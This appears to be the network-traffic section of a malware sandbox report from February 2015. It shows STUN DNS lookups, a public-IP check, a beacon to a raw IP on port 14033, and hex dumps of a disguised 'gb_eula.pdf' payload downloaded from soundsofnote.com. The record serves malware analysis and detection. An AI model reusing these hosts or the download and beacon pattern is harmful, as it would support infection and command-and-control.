Feb 19, 2015 13:03:02.221060038 MEZ195.186.1.121192.168.1.100x6e45No error (0)stun.l.google.com173.194.78.127A (IP address)IN (0x0001)
Feb 19, 2015 13:03:19.242624998 MEZ195.186.1.121192.168.1.100xbfcfNo error (0)stun.internetcalls.com77.72.169.154A (IP address)IN (0x0001)
Feb 19, 2015 13:03:36.020833015 MEZ195.186.1.121192.168.1.100xf27dNo error (0)stun.ekiga.net77.72.174.165A (IP address)IN (0x0001)

HTTP Request Dependency Graph

  • checkip.dyndns.org
  • 31.43.236.251:14033
  • soundsofnote.com

HTTP Packets

TimestampSource PortDest PortSource IPDest IPHeaderTotal Bytes Transfered (KB)
Feb 19, 2015 13:01:47.404910088 MEZ103080192.168.1.1091.198.22.70GET / HTTP/1.1
Accept: text/*, application/*
User-Agent: Mazilla/5.0
Host: checkip.dyndns.org
Cache-Control: no-cache
0
Feb 19, 2015 13:01:54.938848019 MEZ80103091.198.22.70192.168.1.10HTTP/1.1 200 OK
Content-Type: text/html
Server: DynDNS-CheckIP/1.0
Connection: close
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 105
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 38 38 2e 31 33 38 2e 31 37 2e 31 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 188.138.17.15</body></html>
0
Feb 19, 2015 13:01:55.676322937 MEZ103114033192.168.1.1031.43.236.251GET /1902uk11/377142/0/51-SP:/0/ELLBEGLBEKBEI HTTP/1.1
User-Agent: Mazilla/5.0
Host: 31.43.236.251:14033
Cache-Control: no-cache
1
Feb 19, 2015 13:01:56.334208965 MEZ103280192.168.1.10216.194.168.39GET /mandoc/gb_eula.pdf HTTP/1.1
Accept: text/*, application/*
User-Agent: Mazilla/5.0
Host: soundsofnote.com
Cache-Control: no-cache
2
Feb 19, 2015 13:01:58.230360031 MEZ801032216.194.168.39192.168.1.10HTTP/1.1 200 OK
Date: Thu, 19 Feb 2015 12:01:57 GMT
Server: Apache
Last-Modified: Thu, 19 Feb 2015 10:19:49 GMT
Accept-Ranges: bytes
Content-Length: 407410
Content-Type: application/pdf
Data Raw: ff 38 30 69 0d 04 96 7a 23 c5 7c 3c 1a c6 ef 0a 0e c5 d9 09 0f c5 5f 46 f0 e5 eb d5 ea 23 6f 82 9f 47 bc f1 73 48 ee c6 5e 4e ed 30 5f ca 1c 78 1c c6 6d 6e 9a 80 53 6e 99 b8 57 69 7b c7 aa 3e 14 3a 38 0a 04 c5 ab b5 11 3b 63 c0 d3 a3 96 72 43 b1 87 b5 5c 29 20 f6 91 90 6f ff fb c7 a8 ee 97 c7 28 c6 18 b2 bc 7e 97 c7 cd 86 1b ec 54 6b 08 af aa 56 f1 c2 ab 3e dd 56 af 2f 23 c5 68 b5 f3 4e e9 02 26 15 22 6b ce 4e e9 16 ae 80 47 b5 62 f1 22 73 d9 4e e9 6e a3 80 5f 54 2a ad ab 1e 2c c5 54 4b d9 3a de ce d1 56 a3 2f 2f c5 2e fe 45 d4 c1 3f 59 c5 8b 3e 32 3a de ca 63 3a 38 36 25 c5 ab b7 70 21 c1 3a 5e c5 bb 3e 37 ad ab 2e 38 c5 54 4b dd 3a 38 36 2b c5 ab b5 46 21 20 4b c0 4e fe d6 32 72 e1 38 6f 44 69 c6 3f c5 ab b5 0a d1 21 38 c9 c2 ed 79 0b b0 5c 67 12 46 52 3f 31 cf 20 73 b1 4e e9 32 6d 0d 40 33 cc 87 a7 6c cb 07 83 b5 03 c9 f1 15 82 4e d6 da c0 87 a7 3d b4 92 f9 54 49 ad ab 2e 4e c5 fa 69 b0 56 a3
Data Ascii: 80iz#|<_F#oGsH^N0_xmnSnWi{>:8;crC\) o(~TkV>V/#hN&"kNGb"sNn_T*,TK:V//.E?Y>2:c:86%p!:^>7.8TK:86+F! KN2r8oDi?!8y\gFR?1 sN2m@3lN=TI.NiV
2
Feb 19, 2015 13:01:58.338836908 MEZ801032216.194.168.39192.168.1.10Data Raw: 2f 50 c5 f1 61 da 87 bf 3d 17 39 20 ce d8 8f bb bb 9d b1 a2 b4 53 4d ac 78 11 8c de c9 d4 07 83 67 11 b0 02 b5 1c 2d 20 be da c5 ab 3e 58 80 4f b5 a4 4e ec 32 5e 80 4f 6e a1 56 ab 2f 5f c5 22 7b a0 4e ec 2e 62 80 4f b7 27 25 20 ce e8 82 af 7e e1
Data Ascii: /Pa=9 SMxg- >XON2^OnV/_"{N.bO'% ~{N[al>h59L:T>j.=.!~<:VC.n KpjJ0L.>t[JrTv@;tO~8TK:8j} yl UK="6xj(NC.`{:T!{vmN NM> ,
4
Feb 19, 2015 13:01:58.338840961 MEZ801032216.194.168.39192.168.1.10Data Raw: d5 ad c4 98 fe e1 c6 f9 54 bf ae 79 c6 61 e7 ab 6c 41 c6 b3 bf c2 46 99 b6 43 2e dd be 82 45 6f 2a a4 ca a3 bf 2a ea eb 3c 91 91 98 c1 88 91 c1 3c 21 8a 85 9e 80 36 ab bd 35 39 de 3a ff 06 40 36 95 ae 83 5e cd 4b 2e e6 32 46 54 c1 87 96 43 db 2d
Data Ascii: TyalAFC.Eo**<<!659:@6^K.2FTC-g.K.3huI>tC1&UCS9:y9C:gT*"^1s%s{$gJJ(sF.'K&fo<v?&kr&TTK?{+G1Z[
5
Feb 19, 2015 13:01:58.338937044 MEZ801032216.194.168.39192.168.1.10Data Raw: 3c ce 0a a9 75 e8 ca fb 38 8d ba ca 4c 05 a0 bf 68 a6 d1 d3 7c 57 d2 6b d8 ce ed c0 9f 36 9e fc 2c 3a 3d af 8e 3d 41 69 36 5c ec 3b 3d 63 20 53 2c 20 5b 5a 39 c7 cc 40 0b 60 ca c3 6a 3b ca 69 e9 3f ca de e1 53 ec fb 36 f3 ce a8 ee b7 7c 3f 0a 54
Data Ascii: <u8Lh|Wk6,:==Ai6\;=c S, [Z9@`j;i?S6|?T&{j=g.`DeBoVh?!5)#{"Oo#M#ZFK`G%0'{E<S7^1?W0hX>&3TH~^T>JH~`?apVnkel">
6
Feb 19, 2015 13:01:58.339380026 MEZ801032216.194.168.39192.168.1.10Data Raw: 8c 67 b3 5e 39 2a fe da 40 de a2 75 d5 b5 ff a1 2d fc 78 1f ca 63 b7 e2 a8 21 f8 e1 c7 ad 6e e2 db ab 35 49 d9 fd 69 73 43 fc 78 66 69 ea 72 86 c6 ab be 2c 80 2a 48 a1 fc 2a 30 77 96 eb a7 42 c3 57 ff c4 fe 2b 37 75 0a c3 e2 0f cc 8e 3a c6 a7 51
Data Ascii: g^9*@u-xc!n5IisCxfir,*H*0wBW+7u:QEC\i4qK;2:+"^9?>nhq<=Y|)8TU+>Ln]D@*?I_G(iG{!/>^+>OX6{:K9mLNtP3vSKPyn2
8
Feb 19, 2015 13:01:58.339421988 MEZ801032216.194.168.39192.168.1.10Data Raw: 5b 9e 68 bc 22 d8 9c 4c c6 db 05 2a 47 40 04 03 9d c3 5e 3c cb fd d6 d1 af aa 9e fb 23 fc 56 03 e8 aa 77 b6 cb fb e8 c6 a2 13 1c 93 fc 8e 3f 9c a4 3e 4e b5 98 a6 ff 9b 32 6b 3f 15 f1 be 79 9f c8 ef 31 b7 56 43 ef 7c e2 37 fa c1 0a ab 15 07 fd 3b
Data Ascii: [h"L*G@^<#Vw?>N2k?y1VC|7;VOOuWVV76#M(ZV%%`^96;?Y"IN(+J3+Kl;5bty~hoK*KKvd[32
9
Feb 19, 2015 13:01:58.339426994 MEZ801032216.194.168.39192.168.1.10Data Raw: 0b af 10 35 c0 57 86 06 4b 73 c1 08 9d fb 6e ae cb c7 a4 5d 28 a9 28 3a c4 8b 3d 04 de 8a 7f 24 0c ae a6 f8 ef ea 3c 56 8b a9 de f6 cc 6e 4f c2 c5 4a 18 5e 97 92 4b fa c5 cb 89 03 4c 49 97 f0 33 be e6 a0 2c a6 9f 67 cb 40 3c 47 97 62 3e 53 80 c3
Data Ascii: 5WKsn]((:=$<VnOJ^KLI3,g@<Gb>SNKb?cv;K?MH?-{GbJ\/f:k%fCV4TybU6?H w/kv"('K_,! lz^Hi$?+?IE
10
Feb 19, 2015 13:01:58.342705011 MEZ801032216.194.168.39192.168.1.10Data Raw: 3c ab 0d 2e 93 f5 fd 87 d8 33 69 10 cc 05 9e a9 0b af 1a a6 84 f3 8e f3 6e 18 3e 3c 7d ab a8 5c 7f ab 7e af 7c ab b4 44 cc 1b 8f f8 9e d5 8d f9 ec f1 8e fa be 18 3e 6b 69 1a 3e 9a 7f ab 3e a6 7c ab 64 4d cc 01 4e 4e cc e5 8d 00 2d 1a 3e 43 7d ab
Data Ascii: <.3in><}\~|D>ki>>|dMNN->C}[n_}w>m>~T}t~QtQ}^I3>;>v>L%N'3!/8&=K?KG\<\&aEb{HoB^D{o->
12
Feb 19, 2015 13:01:58.342711926 MEZ801032216.194.168.39192.168.1.10Data Raw: ae a3 95 d0 00 49 3e af 45 53 0d 9d 7e 84 94 de 7e 63 b3 2a 32 22 38 01 c9 a9 d2 01 c9 06 b3 5e f6 1b 11 2b a8 00 b5 66 c8 26 8b 84 c4 c3 6c fa 8e bf b1 61 ee e8 32 e8 c9 c1 3e 46 96 01 93 c7 ca 9b 94 7a af ab bf aa 40 cb 3d c1 30 63 3e 1a c7 1b
Data Ascii: I>ES~~c*2"8^+f&la2>Fz@=0c>m~p~ XL2Ydj<Mf96Y>96 N?f>/dK*~.iI\TKZ/,g0@)KSN[0b>+g
13
Feb 19, 2015 13:01:58.342714071 MEZ801032216.194.168.39192.168.1.10Data Raw: cf ef 5b ae aa c5 5a ac bd eb 62 8f b7 c8 52 be ee be 4d 5d 6f ab 4a a8 a1 09 3e ee ef eb 06 c7 b9 8b 14 b1 df 8b 11 a5 ef a9 1e a2 ca f4 7a 84 80 f9 7a 54 ef 84 5a f5 ff 8b 1e 63 c6 b9 0f 68 c6 dd 4c 1c dc fd 57 ab cf df 4b bb a3 ea 52 b7 a0 eb
Data Ascii: [ZbRM]oJ>zzTZchLWKR]XZLT00:^0?J[[joZ009JX;PA9U_WO`00X8OK[J{>z 1>>
14
Feb 19, 2015 13:01:58.354738951 MEZ801032216.194.168.39192.168.1.10Data Raw: 2f b9 c1 2e 5e cc 59 57 4c 3a 7f 72 d0 e7 6b 6c 95 f9 6d 10 82 ab 71 07 99 e7 7b 42 8c e6 ff e0 da c9 47 30 b5 d8 b4 44 b2 a5 c4 6b f4 a9 62 b8 c5 54 2b d7 49 e4 28 69 d6 ab 59 38 b1 c6 7a 2a a4 ca c1 b3 df 54 31 d2 4b 87 18 b1 f3 54 1d b0 c3 34
Data Ascii: /.^YWL:rklmq{BG0DkbT+I(iY8z*T1KT4Q}>W5L26JP1TI/<K/JO?[<l;Q+Vn_>Zkdb.?hZ>:Vkmls1L+L[S-~}66.v]L+n
15
Feb 19, 2015 13:01:58.354759932 MEZ801032216.194.168.39192.168.1.10Data Raw: e2 85 0c 9a c1 9d 10 98 e4 aa 3a e6 b0 d1 3e c5 bd c7 5f 82 e4 85 0e 2e d1 ec 7b fb d1 27 53 b4 c7 aa 3e b1 cb d8 3e b2 95 fb 3e bf d1 37 7c 15 d2 ab 84 c1 d1 ab 1e e2 80 ab 3e ff 19 a2 ca cd c0 aa a8 b9 d1 2f f6 b3 f7 dd 3e ef d1 97 fe b5 41 63
Data Ascii: :>_.{'S>>>7|>/>Ac:v>>]k>zkk>@e7k>zk2k>k#Mk>|e9k> k>k'k>\kk7y#ak>
17
Feb 19, 2015 13:01:58.432318926 MEZ801032216.194.168.39192.168.1.10Data Raw: e1 84 9e 17 d3 ac 3f 52 a2 db 13 09 72 ab 3e 39 d3 3e 9b 5b bd cf be 52 bd c2 4a 75 b2 c7 3e 26 e6 19 3f 7a 62 af 6b cf ce 1f 17 3f d3 8b 7f 45 b9 de 4d 81 db fb 4c 27 ba dd 2e 64 b4 ce 4d 25 45 25 3f 33 60 8f 3f c5 df ea 3e 65 22 a6 3d c8 fb 79
Data Ascii: ?Rr>9>[RJu>&?zbk?EML'.dM%E%?3`?>e"=y0k{?m{V]Fg#%0>arn5LN>>7y/#vv;I>tJMl[[?OTOB*uUqU/Lw,>C>B>A>@T1P1Q1
18
Feb 19, 2015 13:01:58.531083107 MEZ801032216.194.168.39192.168.1.10Data Raw: 44 08 ce d4 32 3a a3 3f 84 a9 f7 dd c0 67 18 f3 f6 86 71 b6 1d 36 68 6a 2a 09 fa 44 2d 4b a1 c3 dd eb 84 be 7e ea 62 01 7b 24 44 56 8d ec 58 80 c6 9a 0a 5e f3 f2 99 57 36 0d d6 09 89 84 09 3d 6d dd 1d b2 62 e3 47 e2 df 60 18 c1 7d 34 a4 0b e3 ca
Data Ascii: D2:?gq6hj*D-K~b{$DVX^W6=mbG`}4ft?aMe9^y>~t}8+XH>FPRb)(T(us(Z_(up}}bgM70{ghG5[:%/4wJGL6B.!
18
Feb 19, 2015 13:01:58.531810045 MEZ801032216.194.168.39192.168.1.10Data Raw: c8 b0 cc 6e c4 0e 09 61 a3 c3 c1 74 47 0b c8 16 38 b0 2f 8f bd 3b 71 3c 05 a5 b8 79 5c 21 55 69 5b 13 4b 73 1a 9a 5b 13 68 5c e3 78 a0 5a 52 f3 f2 76 d5 c4 32 ae 4e 48 66 b6 89 0d 53 aa 27 b1 b1 d7 a9 61 e6 ed 85 61 e4 76 cf 8f aa a0 9b 8a a5 a2
Data Ascii: natG8/;q<y\!Ui[Ks[h\xZRv2NHfS'aavv[=KEg+gz;0]u9;@Z:wO3uPmObYRr:?3m5LVHaq"K^oei}&]hSspX&h;UEg(c~JY+
20
Feb 19, 2015 13:01:58.531829119 MEZ801032216.194.168.39192.168.1.10Data Raw: d1 16 ad 8e 5e ce fe dc ef 13 9e de 16 94 76 00 7c 3a d1 1a ca 3e 1b bc 0d 85 7c 9b b9 60 ae fd 09 1c a2 0c 45 15 47 62 b6 04 04 22 60 28 71 95 b5 c0 1f 9f 9b 25 3f b4 05 cd bb 0c 16 39 6a ca 51 47 20 e8 1a f9 c2 9a ed 1f e9 da c8 e0 8a c3 68 e4
Data Ascii: ^v|:>|`EGb"`(q%?9jQG hDl#^D]R`?3r#p0^Fl7d5BS5ssU5ed)uT~xJ`#fY\o@dMSUx(_h
21
Feb 19, 2015 13:01:58.531991005 MEZ801032216.194.168.39192.168.1.10Data Raw: 68 e5 4a ad e4 e6 19 da e2 f1 0a 18 e0 fc 97 dc 13 25 9e 58 43 49 9c 64 c6 ed 7f fd ac 7c 82 e4 74 c9 89 71 cf 0a dd 8f a0 6e 20 20 6d 58 2c 11 02 a1 c0 94 2c 19 83 39 47 cc af 1d 30 75 75 01 eb 92 a6 6f b8 5f 89 c3 68 c1 58 ee 1e 5c ca a6 5f db
Data Ascii: hJ%XCId|tqn mX,,9G0uuo_hX\__X^&{7`J'$q.<EXI7oMinP|o7%$nBxQB[gnEEo3D;aH[uF{#?.:
22
Feb 19, 2015 13:01:58.536916971 MEZ801032216.194.168.39192.168.1.10Data Raw: 74 b3 bc da c0 20 db d0 d7 74 9e 45 5e d5 e6 c5 7e d3 2f a9 68 a8 b9 32 4f c2 2b 9e 72 3a a2 33 4e 06 96 30 83 2b 3c 84 c8 78 d2 e0 15 b5 5d e6 3b 32 7b fe c4 87 c4 e6 63 1d f8 8e ec f0 76 be 2b d2 23 95 e5 af 7f 04 9f cf af 24 b5 a7 e2 c3 4a e9
Data Ascii: t tE^~/h2O+r:3N0+<x];2{cv+#$J!95h*TEfM%sH3v17$E+]49Uu]3I\Qq.Uiy[9ql[tMhym)LCxM :xFK lcy>
23
Feb 19, 2015 13:01:58.536926031 MEZ801032216.194.168.39192.168.1.10Data Raw: 10 8d f6 48 55 5a aa a4 a3 b5 4e b5 d6 15 60 54 ac f1 fa 95 e5 ee b5 f3 5d db f4 80 84 44 26 de 9e 68 65 af f8 ae 99 c8 fb 54 fe 0c 5d f9 66 88 43 9f 53 5f cb e5 c8 26 6a e9 f8 28 e0 ac 2b 51 5a 28 d9 6f 66 11 24 ce a9 f5 d1 70 c3 9b 42 0d 56 95
Data Ascii: HUZN`T]D&heT]fCS_&j(+QZ(of$pBV4E_xXf|``KO1S%)[iA.0s+|i@Bs6#qIH~<LVm7y2nI!{Skf6L@>.
25
Feb 19, 2015 13:01:58.536928892 MEZ801032216.194.168.39192.168.1.10Data Raw: 14 9b f0 96 f3 1b c0 a3 a2 08 f9 41 57 37 5d 62 98 7e b4 9c 74 cc 0b 3a 2a 67 1c cc 41 d8 79 3d 31 c5 81 08 5a 1b 17 19 88 ad d5 6e e8 d2 f6 b2 23 2b eb 08 fb c9 ed 87 67 56 14 a1 5e a5 64 9a 52 93 95 4e b4 45 49 4e c1 f0 38 71 51 53 03 c9 9d ca
Data Ascii: AW7]b~t:*gAy=1Zn#+gV^dRNEIN8qQS0{)wl4MSfl`'Y6g0U wPOFs2uDj`KFx{OG]+'zyzX(2]#l-!~.Q'O/"mBxC`0
25
Feb 19, 2015 13:01:58.537331104 MEZ801032216.194.168.39192.168.1.10Data Raw: bb 94 cd 12 f9 01 04 3e 22 fe a7 14 0f 44 14 99 03 76 d1 2f 5c 64 ea 2c 81 09 c8 c7 bf 23 97 d7 10 f6 d9 67 e2 72 f8 0d 41 48 98 8d b1 d4 56 58 85 e9 be 00 db d3 8b ac 7e e7 90 33 52 ba d9 dc 6d 91 95 0e 5a 97 f5 a5 ac 7b 3c ed 53 51 f6 87 fe ab
Data Ascii: >"Dv/\d,#grAHVX~3RmZ{<SQ@uI5!%1KM;ZoB!Rz:x=TkkX`9EDm'}Xt\|cnl Rq)6mEAwAU'hjDa(+*=lew5H"\~j;JPdFA
27
Feb 19, 2015 13:01:58.537339926 MEZ801032216.194.168.39192.168.1.10Data Raw: 00 43 cc 0a 9e aa 24 29 3b 81 d4 23 83 69 1c 45 af 5e 64 58 64 7e 27 55 df a9 33 0d 96 4e fe a8 05 1d cd 2b 27 f4 b5 ff bd 69 ad 89 9b 66 f6 a1 b9 e2 0e f6 b6 79 ec ab 05 3d 6a 81 8d 8c 1e 47 51 31 ad 9d 8c 77 0f 6c ee 6e 94 96 6f d5 90 5a 48 33
Data Ascii: C$);#iE^dXd~'U3N+'ify=jGQ1wlnoZH3u0WtVQ5q*'/`@bRP7yiYFwvHto@.W`t13Z^!\lDKZygef-r=kaZ]Bb@l#..vnrMdK
28
Feb 19, 2015 13:01:58.537437916 MEZ801032216.194.168.39192.168.1.10Data Raw: 4d f5 dd 5d 8e 1c 3b ed 7a 38 38 47 8c b1 f9 f8 d6 ea dc 9d 3a 63 a9 41 9c ab 9d 1d 32 17 c8 01 06 ba 87 d2 4f f6 c0 d0 79 f4 5c d6 fb af 66 be ee 95 4a 67 bc e9 0e 7f b0 2c 8f ab 8f 7b e5 26 9a 99 7e 90 9f ac 4c 8c 4e 0c a6 93 4b 84 6f a9 18 58
Data Ascii: M];z88G:cA2Oy\fJg,{&~LNKoXR+dc-Dt(3>0A0j@(1P9|@k}\Bcq;KLd|4{:;P$'/pP@s+4zAtZfIBtYl
29
Feb 19, 2015 13:01:58.542785883 MEZ801032216.194.168.39192.168.1.10Data Raw: 71 61 9e 18 95 6d 33 14 a1 8e ce 77 c7 57 8c c3 35 bb b5 8b 9a 9f 4e d9 9b 40 ea 1a 81 e8 4e c3 9b 18 b6 ad 98 7c 74 ea 04 e9 36 51 3a c5 36 e8 1f d6 08 33 2c dc fc 97 bc 61 31 27 39 f1 c1 ad b4 ce 0e 23 18 50 ac 2e 5d ef f6 1e 55 2c 7c 16 68 32
Data Ascii: qam3wW5N@N|t6Q:63,a1'9#P.]U,|h2zRa|>.3Bl=cIud&J6Jc'g,O;'oy-[=@1YZY-1,'gr|CUFP|7)wtG(IPp8w>"{g$d
30
Feb 19, 2015 13:01:58.566746950 MEZ801032216.194.168.39192.168.1.10Data Raw: b1 87 c0 46 69 ee cc 7a 68 45 db b4 f4 e8 e0 18 bf d9 3f 20 10 8a 7e 3c da 7e 8f 78 a3 da 36 76 75 61 c3 5c ac 6a 69 74 04 eb b1 4e 25 aa 26 2b 53 2c 7d fe 04 53 49 04 9c 61 e8 da 30 ea 24 85 02 c1 92 39 e6 f1 b9 4d 9f 82 8f c0 93 3f 42 ce 0b 97
Data Ascii: FizhE? ~<~x6vua\jitN%&+S,}SIa0$9M?B>9y#nE|7AYT2<?G[>y}a7Z?92cG|mynB"ZAD,TYrE5^"GLLR(2_[Ms
31
Feb 19, 2015 13:01:58.566764116 MEZ801032216.194.168.39192.168.1.10Data Raw: a1 8a 21 6a b4 5b c1 c8 03 16 ce 52 a6 fe db 15 6f 97 c0 11 13 53 8f 32 71 d4 37 5b 75 09 1f 14 9c cd 78 9e 5b fd 8e 36 a2 ac a0 f1 27 eb ba 7a a2 1b 8a e8 22 97 a1 df 88 54 97 35 de db 0d 70 e2 0d cb d0 74 f4 e7 12 7e 80 73 d5 d2 3e 23 04 a5 f5
Data Ascii: !j[RoS2q7[ux[6'z"T5pt~s>##3ep,f4$u}X&TV+8$J]"^}0Bf4Nv(t_ZlG[2sY%K6V"5Sxh?39NTfXf#jqV,
33
Feb 19, 2015 13:01:58.566863060 MEZ801032216.194.168.39192.168.1.10Data Raw: 27 91 c0 5e 2f 0f 35 6d 95 3d cb b2 85 47 2a 63 82 22 7e 5d e2 6b 5e 04 dd da 42 0f c8 c3 e5 1c 4a be 94 a9 c7 0e 69 37 52 08 20 45 60 57 06 87 a3 75 26 18 e9 f9 ff 65 a7 5e d3 54 6f 95 6b a1 b0 a2 0d 33 0d 29 4a 5e eb 7d 0d 1d 41 84 e4 b8 b0 82
Data Ascii: '^/5m=G*c"~]k^BJi7R E`Wu&e^Tok3)J^}AWAz}'!FWl|*=WYKV[7d'B['s`?Wp/:-2x5]Z9mb6Pqk[V*}ivsBH1S^ANd59`TY
34
Feb 19, 2015 13:01:58.630913019 MEZ801032216.194.168.39192.168.1.10Data Raw: 4b 43 b2 6b fb d7 a3 f4 44 f7 73 92 22 1f 73 c2 af ef 6e 83 ad 91 c9 60 7c ed aa ed 54 13 2e 90 1a 20 56 a3 a3 48 9c 93 c5 d8 14 e4 88 fd 87 f4 88 a3 6b d7 db d5 7a 39 a4 ec 0d 00 15 a2 9b 87 52 af d5 a4 84 34 96 ef a4 67 70 3a 7e 06 99 69 e8 cf
Data Ascii: KCkDs"sn`|T. VHkz9R4gp:~iGa\|XWlxDAu*R_N\(Y{7<"k7=-GG[?<Y`;|QQI=A6@g{?)VD(_FwCq3-RW46Z!%(7
35
Feb 19, 2015 13:01:58.631623030 MEZ801032216.194.168.39192.168.1.10Data Raw: 4c ed 87 d1 6e 82 33 9b ac 2a 51 c6 6a 62 33 c2 3b 27 82 0e 99 f0 49 33 50 3c c8 98 4e 17 47 35 3a f7 fb c5 d3 90 95 32 67 3a ff c6 6a 32 33 6b c8 d7 3d f8 d8 ed a7 1e 02 89 2c cf 65 bb 54 32 f1 ba 01 9f 68 9e 25 49 ff f7 88 e1 c6 5d 11 a7 be 19
Data Ascii: Ln3*Qjb3;'I3P<NG5:2g:j23k=,eT2h%I][KE#V3?B1*uzp<YK3"%n!5/~"^-0(&kA#<,XdP#`*bctq}5>jcuZKu/ i
36
Feb 19, 2015 13:01:58.631639957 MEZ801032216.194.168.39192.168.1.10Data Raw: a7 f2 52 ab f7 b7 de 43 1c fc 67 ef 3e f1 21 54 c9 7b ac 6c a0 b3 9e bf 91 c8 b3 1b 8c 04 e4 08 8c a4 c9 dd 00 96 0c ab 86 9b c4 cf 24 33 21 18 3e 62 dd ac 21 84 eb 88 5e bc 60 ce 24 c9 54 da 75 f8 e4 56 5b cd eb f7 36 4d 37 ab 27 7a f6 a7 ee ff
Data Ascii: RCg>!T{l$3!>b!^`$TuV[6M7'zf6>B&Vc.NJu63W^aA>&?G4.1v/r>Gbjv7d{@`amt>b%%vI2yZ~Qwp8)>@tr9zjm
37
Feb 19, 2015 13:01:58.631779909 MEZ801032216.194.168.39192.168.1.10Data Raw: 54 b2 e6 48 a5 73 9e 89 1c 59 fd ab 14 48 c7 ba dc fe 8c ea 3e 4a f8 c1 1f cb f7 49 9d 22 fd d9 59 01 c4 fc 10 bc e2 82 1e f4 e7 d8 04 0b 50 49 3e f6 07 45 50 69 85 b5 59 29 f7 40 50 83 16 c5 1f c8 e6 c8 13 b9 84 9d 59 00 73 ab 44 0a 8e 04 50 0d
Data Ascii: THsYH>JI"YPI>EPiY)@PYsDP>P2[nOKP]>Y!g:;PHP;Ua +>>-HUOY/E?/FO8,j0OnZ>T?xPd?_?9R?IcmW7W,
38
Feb 19, 2015 13:01:58.636456013 MEZ801032216.194.168.39192.168.1.10Data Raw: fe 8e 96 de 50 0e 8d 81 ac c9 d6 ab 4a db 87 84 f4 4e 14 85 3e 64 99 c8 45 da 9e 08 f6 a6 f7 97 37 43 ff 43 6f c1 4f ab c5 24 3b 48 20 76 b1 84 3e 04 c2 ad e1 b3 d1 fc f7 8f 06 ab f7 9a f8 04 3c b1 03 b5 36 96 b1 53 3f b3 c2 ad e2 ad e6 61 69 59
Data Ascii: PJN>dE7CCoO$;H v><6S?aiYV?J8bI!;v,-#*%&1IVk6k6:7!4`T6>:hHanT3t6`>|<M8IH]
40
Feb 19, 2015 13:01:58.636473894 MEZ801032216.194.168.39192.168.1.10Data Raw: f6 ac 32 8d 36 23 47 29 de 1f 49 49 1b b1 c8 74 18 be 94 8f 7e 3d 47 cf 2e 32 47 df 1d 74 d9 48 fc 31 68 c1 84 79 47 15 59 55 49 9b 4f 1b fd c5 7f e9 ec be ff 0d e6 be 5f 8a f7 be ce 58 89 a4 2b 6b d8 a9 2b 14 89 aa 2b d6 e8 be 9f e8 8a 0a 3e f9
Data Ascii: 26#G)IIt~=G.2GtH1hyGYUIO_X+k++>"I>]*ACTjhUVS*B5+0+PaY.],2Uq;w3LUWXHuL!4!G?^}XoEj
41
Feb 19, 2015 13:01:58.636476994 MEZ801032216.194.168.39192.168.1.10Data Raw: 2a 12 69 ad 70 fb e8 41 4a fc 24 c4 be 3b 82 21 2f fb 7d 26 23 55 ac 2b 71 e3 69 ec 4b 01 9f ce 3e d4 b9 29 52 06 e4 e5 be af 84 69 3c b8 bc 4b 30 e2 a5 a4 0e c7 e4 ce 7e 80 99 00 7e 81 28 88 5b 4a e9 85 7c 8f 8c db 2d 66 d8 eb 2d fe a9 ae 5c cc
Data Ascii: *ipAJ$;!/}&#U+qiK>)Ri<K0~~([J|-f-\IjgxR~k6)djjaVP}OYQ-X@j}Y*r_IxUwXxz07lRZM@fX3j^UEK]5H;<JPRk
42
Feb 19, 2015 13:01:58.636801004 MEZ801032216.194.168.39192.168.1.10Data Raw: 8d 04 da 59 0e 87 5d d5 4a 8e 68 c8 e2 ed 5e f1 83 e3 1c f3 a2 81 17 ae 49 a8 9f c0 bd 1e 9e e0 a6 07 12 bc c9 a8 5f db bb 0b 3d 9a ba 81 3d a6 c9 a8 7c 9c 01 c8 3d b1 86 cb 3c 55 e5 ca 0a 9e ef e6 de dc c0 a9 76 a2 09 aa 6e de e2 f0 de fa a8 8b
Data Ascii: Y]Jh^I_==|=<Uvn/K4wJIbTfp>!:=;i'Ix+Y>!ZP^I:.HCT;4848>w:>TT<D"KKPu
43
Feb 19, 2015 13:01:58.636806965 MEZ801032216.194.168.39192.168.1.10Data Raw: 86 ea 3e c2 64 73 5a a1 db 44 b8 55 94 f4 9d 9d 47 e9 06 76 eb 6f f0 24 ac ce 4c e2 c6 ab 3d 6a d9 76 6a a9 ba 9e 3e 44 28 da 19 49 65 b7 51 5e 35 f1 55 bf f4 71 12 16 eb a8 a6 e2 71 3b 22 b5 65 ab 43 95 f9 6a ef e0 7c d2 3e cb 60 3b 6f c4 41 41
Data Ascii: >dsZDUGvo$L=jvj>D(IeQ^5Uqq;"eCj|>`;oAAgyz(qraJm>I>hmp*!U%y%]S1>};0wXy^328j$'Xu>8O7e.N`l*5a>UGnEtb5lZ| ^
45
Feb 19, 2015 13:01:58.636925936 MEZ801032216.194.168.39192.168.1.10Data Raw: ed 89 5e c6 2d a8 5e 4b f0 eb 3f e1 2e ba 39 53 fc eb 3f c4 bb a7 b4 31 a4 d7 22 80 ec 32 69 6c c9 f6 e2 50 82 ef 3c b9 ad bc 39 ba aa e9 35 ff fd eb 3f ca 8c ff 7e cc e9 cb 58 cb ac aa 3a 0d e0 97 bc 9a 54 ca 3e f2 f1 ea 83 87 6e 83 bd 73 cb 1a
Data Ascii: ^-^K?.9S?1"2ilP<95?~X:T>nsh(Uz!~^q-F |?>k>Rj;j[k>&_k8g:QQ9~>>O>>Lf>[>b
46
Feb 19, 2015 13:01:58.643008947 MEZ801032216.194.168.39192.168.1.10Data Raw: 6d cb b3 19 e5 f8 29 ba d0 cd a0 36 aa b6 05 69 ed 7a 54 f6 35 8c 56 aa fc ab 71 ce 87 9d 13 4d 94 12 0e 7c 8b 52 a2 8d e9 e2 3a 0d ac ab c7 80 d9 21 e0 e1 44 94 3e a6 b7 05 75 84 b6 2c 9f c8 a0 11 fd 5e e1 ff f1 07 ed be 80 b0 73 0a d9 79 86 ab
Data Ascii: m)6izT5VqM|R:!D>u,^sy\`>m3kN6e%DY)]~'2}2htUQ@\>\=;1sQ^LP7/>aLfj;@/g>2]F[1X^+^Z:z
46
